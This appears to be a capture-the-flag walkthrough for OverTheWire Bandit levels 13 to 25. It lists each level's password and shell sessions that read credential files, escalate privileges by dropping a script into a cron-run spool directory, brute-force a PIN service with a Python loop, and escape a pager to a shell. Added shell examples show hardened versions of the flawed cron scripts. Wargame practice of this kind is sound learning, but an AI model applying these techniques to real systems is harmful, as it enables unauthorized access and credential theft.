OverTheWire - Bandit Walkthrough 2
OvertheWire - http://overthewire.org/wargames/bandit/
Connect - ssh : bandit.labs.overthewire.org port : 2220
Level13 → Level14
login : bandit13 passwd : 8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL
```
bandit13@bandit:~$ ls
sshkey.private
bandit13@bandit:~$ mkdir /tmp/myname11
bandit13@bandit:~$ cp sshkey.private /tmp/myname11
bandit13@bandit:~$ cd /tmp/myname11
bandit13@bandit:/tmp/myname11$ ls -al sshkey.private
-rw-r----- 1 bandit13 bandit13 1679 Jun 5 10:54 sshkey.private
bandit13@bandit:/tmp/myname11$ chmod 400 sshkey.private
bandit13@bandit:/tmp/myname11$ ssh -i sshkey.private bandit14@localhost
bandit14@bandit:~$ cat /etc/bandit_pass/bandit14
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
```
Level14 → Level15
login : bandit14 passwd : log in with the SSH private key 4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
```
bandit14@bandit:~$ cat /etc/bandit_pass/bandit14
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
bandit14@bandit:~$ nc localhost 30000
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
Correct!
BfMYroe26WYalil77FoDi9qh59eK5xNr
```
Level15 → Level16
login : bandit15 passwd : BfMYroe26WYalil77FoDi9qh59eK5xNr
```
bandit15@bandit:~$ openssl s_client -connect localhost:30001 -ign_eof
CONNECTED(00000003)
depth=0 CN = a9678380ab81
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = a9678380ab81
verify return:1
---
Certificate chain
 0 s:/CN=a9678380ab81
   i:/CN=a9678380ab81
---
Server certificate
-----BEGIN CERTIFICATE-----
...
-----END CERTIFICATE-----
subject=/CN=a9678380ab81
issuer=/CN=a9678380ab81
---
No client certificate CA names sent
---
SSL handshake has read 1682 bytes and written 637 bytes
---
New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
    Protocol  : SSLv3
    Cipher    : DHE-RSA-AES256-SHA
    Session-ID: 593FADB9483C3DD0D0283B7A351A874EB583394BD7094C6F2156B283BBD49890
    Session-ID-ctx:
    Master-Key: 730C4A9E11BC28FD3138044D7148BFF18CCEEE8AE9F4CBF3D2927CB54C6777E769B8BC3915FB714A4003F319D22442F0
    Key-Arg   : None
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    Start Time: 1496718299
    Timeout   : 300 (sec)
    Verify return code: 18 (self signed certificate)
---
BfMYroe26WYalil77FoDi9qh59eK5xNr
Correct!
cluFn7wTiGryunymYOu4RcffSxQluehd
```
Level16 → Level17
login : bandit16 passwd : cluFn7wTiGryunymYOu4RcffSxQluehd
```
bandit16@bandit:~$ netstat -ant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.11:42267        0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:31518           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:31046           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:31691           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:2220            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:31790           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:30000           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:30001           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:113             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:30002           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:31960           0.0.0.0:*               LISTEN
tcp        0      0 172.18.0.7:22           172.18.0.1:33182        ESTABLISHED
tcp        0      0 127.0.0.1:52378         127.0.0.1:22            ESTABLISHED
tcp        0      0 127.0.0.1:22            127.0.0.1:52378         ESTABLISHED
tcp6       0      0 :::2220                 :::*                    LISTEN
tcp6       0      0 :::22                   :::*                    LISTEN
bandit16@bandit:~$ openssl s_client -connect localhost:31790 -ign_eof
CONNECTED(00000003)
depth=0 CN = a9678380ab81
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = a9678380ab81
verify return:1
---
Certificate chain
 0 s:/CN=a9678380ab81
   i:/CN=a9678380ab81
---
Server certificate
-----BEGIN CERTIFICATE-----
...
-----END CERTIFICATE-----
subject=/CN=a9678380ab81
issuer=/CN=a9678380ab81
---
No client certificate CA names sent
---
SSL handshake has read 1682 bytes and written 637 bytes
---
New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
    Protocol  : SSLv3
    Cipher    : DHE-RSA-AES256-SHA
    Session-ID: 44D6D6D561A130DFF2E31AB4731497C17A3EEB907E274CEDD92FBEF70D97DDD7
    Session-ID-ctx:
    Master-Key: 8A443D005F46DD14997CC6CD703BCE57A264573C37E5672673F149F11500E50A7C3521627332E07BE93CEE5B223D155B
    Key-Arg   : None
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    Start Time: 1496718535
    Timeout   : 300 (sec)
    Verify return code: 18 (self signed certificate)
---
cluFn7wTiGryunymYOu4RcffSxQluehd
Correct!
-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----

bandit16@bandit:~$ mkdir /tmp/myname13
bandit16@bandit:~$ cd /tmp/myname13
bandit16@bandit:/tmp/myname13$ vi ssh.key
bandit16@bandit:/tmp/myname13$ ls -al
total 12
drwxrwxr-x 2 bandit16 bandit16 4096 Jun 6 03:10 .
drwxrwx-wt 3 root root 4096 Jun 6 03:10 ..
-rw-rw-r-- 1 bandit16 bandit16 1676 Jun 6 03:10 ssh.key
bandit16@bandit:/tmp/myname13$ chmod 400 ssh.key
bandit16@bandit:/tmp/myname13$ ls -al
total 12
drwxrwxr-x 2 bandit16 bandit16 4096 Jun 6 03:10 .
drwxrwx-wt 3 root root 4096 Jun 6 03:10 ..
-r-------- 1 bandit16 bandit16 1676 Jun 6 03:10 ssh.key
bandit16@bandit:/tmp/myname13$ ssh -i ssh.key bandit17@localhost
```
Level17 → Level18
login : bandit17 passwd : log in directly with the RSA private key xLYVMN9WE5zQ5vHacb0sZEVqbrp7nBTn
```
bandit17@bandit:~$ ls
passwords.new passwords.old
bandit17@bandit:~$ diff passwords.new passwords.old
42c42
< kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd
---
> OaxZoUOzBod2mEDgQikLmyGeCCR95bZt
```
Level18 → Level19
login : bandit18 passwd : kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd
```
bandit17@bandit:~$ ssh bandit18@localhost /bin/bash
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is ee:4c:8c:e7:57:2c:bc:63:24:b8:e6:23:27:63:72:9f.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit17/.ssh/known_hosts).
 _                     _ _ _
| |__   __ _ _ __   __| (_) |_
| '_ \ / _` | '_ \ / _` | | __|
| |_) | (_| | | | | (_| | | |_
|_.__/ \__,_|_| |_|\__,_|_|\__|
a http://www.overthewire.org wargame.

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0640 for '/home/bandit17/.ssh/id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
bad permissions: ignore key: /home/bandit17/.ssh/id_rsa
bandit18@localhost's password:
ls
readme
cat readme
IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x
```
Level19 → Level20
login : bandit19 passwd : IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x
```
bandit19@bandit:~$ ls -al
total 32
drwxr-xr-x 3 bandit19 bandit19 4096 Jun 6 03:18 .
drwxr-xr-x 34 root root 4096 Jun 6 03:18 ..
-rw-r--r-- 1 bandit19 bandit19 220 Apr 9 2014 .bash_logout
-rw-r--r-- 1 bandit19 bandit19 3637 Apr 9 2014 .bashrc
drwx------ 2 bandit19 bandit19 4096 Jun 6 03:18 .cache
-rw-r--r-- 1 bandit19 bandit19 675 Apr 9 2014 .profile
-rwsr-x--- 1 bandit20 bandit19 7378 Jun 5 20:26 bandit20-do
bandit19@bandit:~$ ./bandit20-do
Run a command as another user.
  Example: ./bandit20-do id
bandit19@bandit:~$ ./bandit20-do id
uid=11019(bandit19) gid=11019(bandit19) euid=11020(bandit20) groups=11020(bandit20),11019(bandit19)
bandit19@bandit:~$ ./bandit20-do cat /etc/bandit_pass/bandit20
GbKksEFF4yrVs6il55v6gwY5aVje5f0j
```
Level20 → Level21
login : bandit20 passwd : GbKksEFF4yrVs6il55v6gwY5aVje5f0j
```
bandit20@bandit:~$ ls -al
total 36
drwxr-xr-x 3 bandit20 bandit20 4096 Jun 6 03:31 .
drwxr-xr-x 35 root root 4096 Jun 6 03:22 ..
-rw------- 1 bandit20 bandit20 89 Jun 6 03:31 .bash_history
-rw-r--r-- 1 bandit20 bandit20 220 Apr 9 2014 .bash_logout
-rw-r--r-- 1 bandit20 bandit20 3637 Apr 9 2014 .bashrc
drwx------ 2 bandit20 bandit20 4096 Jun 6 03:22 .cache
-rw-r--r-- 1 bandit20 bandit20 675 Apr 9 2014 .profile
-rwsr-x--- 1 bandit21 bandit20 8014 Jun 5 20:26 suconnect
bandit20@bandit:~$ ./suconnect
Usage: ./suconnect <portnumber>
This program will connect to the given port on localhost using TCP. If it receives the correct password from the
other side, the next password is transmitted back.
bandit20@bandit:~$ nc -l 20000
^Z
[1]+ Stopped nc -l 20000
bandit20@bandit:~$ ./suconnect 20000
^Z
[2]+ Stopped ./suconnect 20000
bandit20@bandit:~$ fg 1
nc -l 20000
GbKksEFF4yrVs6il55v6gwY5aVje5f0j
^Z
[1]+ Stopped nc -l 20000
bandit20@bandit:~$ fg 2
./suconnect 20000
Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Password matches, sending next password
bandit20@bandit:~$ fg 1
nc -l 20000
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr
```
Level21 → Level22
login : bandit21 passwd : gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr
```
bandit21@bandit:~$ cd /etc/cron.d/
bandit21@bandit:/etc/cron.d$ ls
cron-apt cronjob_bandit22 cronjob_bandit23 cronjob_bandit24 php5
bandit21@bandit:/etc/cron.d$ cat cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
bandit21@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
bandit21@bandit:/etc/cron.d$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
```
Level22 → Level23
login : bandit22 passwd : Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
```
bandit22@bandit:~$ cd /etc/cron.d/
bandit22@bandit:/etc/cron.d$ ls
cron-apt cronjob_bandit22 cronjob_bandit23 cronjob_bandit24 php5
bandit22@bandit:/etc/cron.d$ cat cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
bandit22@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget
bandit22@bandit:/etc/cron.d$ echo I am user bandit23 | md5sum | cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349
bandit22@bandit:/etc/cron.d$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
```
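The cron script in this level drops the password into a `/tmp` file whose name any local user can recompute from the username. The following is an added example, not part of the original post or of the wargame's own code: it reproduces that derivation and sets it beside an owner-only file with a random name. The function names and the directory argument are assumptions.

```shell
# Added example; function names are hypothetical.

# Weak pattern from cronjob_bandit23.sh: the file name is a pure function
# of the username, so anyone can work out where the secret will be written.
predictable_name() {
    echo "I am user $1" | md5sum | cut -d ' ' -f 1
}

# Hardened pattern: private directory, random file name, owner-only mode.
# $1 = directory to hold the file, stdin = secret content.
# Prints the path of the file that was written.
write_secret_private() {
    local dir=$1 out
    (
        umask 077                          # nothing for group or others
        mkdir -p "$dir" && chmod 700 "$dir" || exit 1
        out=$(mktemp "$dir/secret.XXXXXXXXXX") || exit 1
        cat > "$out"
        echo "$out"
    )
}

# Audit helper: permission string of a path, e.g. "-rw-------".
mode_of() {
    ls -ld "$1" | cut -c1-10
}
```

With the hardened writer, a reader needs both the random name and access to a mode-700 directory, so recomputing a hash of public data no longer locates the file.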
Level23 → Level24
login : bandit23 passwd : jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
```
bandit23@bandit:~$ cd /etc/cron.d/
bandit23@bandit:/etc/cron.d$ ls
cron-apt cronjob_bandit22 cronjob_bandit23 cronjob_bandit24 php5
bandit23@bandit:/etc/cron.d$ cat cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        timeout -s 9 60 ./$i
        rm -f ./$i
    fi
done

bandit23@bandit:/etc/cron.d$ mkdir /tmp/myname14
bandit23@bandit:/etc/cron.d$ cd /tmp/myname14
bandit23@bandit:/tmp/myname14$ vi test
bandit23@bandit:/tmp/myname14$ cat test
cd /var/spool/bandit24
cat /etc/bandit_pass/bandit24 > text.txt
cat text.txt
bandit23@bandit:/tmp/myname14$ chmod 777 test
bandit23@bandit:/tmp/myname14$ ls -al test
-rwxrwxrwx 1 bandit23 bandit23 77 Jun 6 03:49 test
bandit23@bandit:/tmp/myname14$ cd /var/spool/bandit24
bandit23@bandit:/var/spool/bandit24$ cp /tmp/myname14/test .
bandit23@bandit:/var/spool/bandit24$ ./test
./test: line 2: text.txt: Permission denied
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
```
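The loop in `cronjob_bandit24.sh` runs every file found in the spool directory with the job owner's privileges, whoever put it there. The following is an added example, not the wargame's own script: a hardened variant of that loop which refuses a spool that group or others can write to, and executes only regular files owned by the expected user. The function names are assumptions.

```shell
# Added example: hypothetical hardened variant of the loop in cronjob_bandit24.sh.

# True if the spool directory has no group/other write bit.
spool_is_private() {
    case $(ls -ld "$1" | cut -c1-10) in
        d????-??-?) return 0 ;;
        *) return 1 ;;
    esac
}

# True if $1 is a regular file (not a symlink), owned by user $2,
# and not writable by group or others.
script_is_trusted() {
    local f=$1 owner=$2
    [ -f "$f" ] && [ ! -L "$f" ] || return 1
    [ "$(ls -ld "$f" | awk '{print $3}')" = "$owner" ] || return 1
    case $(ls -ld "$f" | cut -c1-10) in
        -????-??-?) return 0 ;;
        *) return 1 ;;
    esac
}

# Run only trusted scripts from a private spool, then delete every entry.
# Prints "skipped <path>" for each entry it refused to execute.
run_spool() {
    local dir=$1 owner=$2 f
    if ! spool_is_private "$dir"; then
        echo "refusing: $dir is writable by group or others"
        return 1
    fi
    for f in "$dir"/* "$dir"/.[!.]*; do
        [ -e "$f" ] || [ -L "$f" ] || continue
        if script_is_trusted "$f" "$owner"; then
            timeout -s 9 60 "$f" || echo "failed $f"
        else
            echo "skipped $f"
        fi
        rm -f -- "$f"
    done
}
```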
Level24 → Level25
login : bandit24 passwd : UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
```
bandit24@bandit:~$ nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 1
Wrong! Please enter the correct pincode. Try again.
^C
bandit24@bandit:~$ vi password.py
bandit24@bandit:~$ cat password.py
import socket

for pin in range(1,10000):
    sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    sock.connect(('localhost',30002))
    msg = 'UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ ' + str(pin) + '\n'
    message = sock.recv(65535)
    sock.send(msg.encode())
    print(message,pin)
    data = sock.recv(65535)
    data = data.decode()
    if not 'Wrong' in data:
        print(pin)
        print(data)
        break
    sock.close()
bandit24@bandit:~$ python3 password.py
...
Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
```
Level25 → Level26
login : bandit25 passwd : uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
```
bandit25@bandit:~$ ls
bandit26.sshkey
bandit25@bandit:~$ cat /etc/passwd
...
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
...
bandit25@bandit:~$ file /usr/bin/showtext
/usr/bin/showtext: POSIX shell script, ASCII text executable
bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh

more ~/text.txt
exit 0
bandit25@bandit:~$ ssh -i bandit26.sshkey bandit26@localhost
v
!r /etc/bandit_pass/bandit26
5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z
```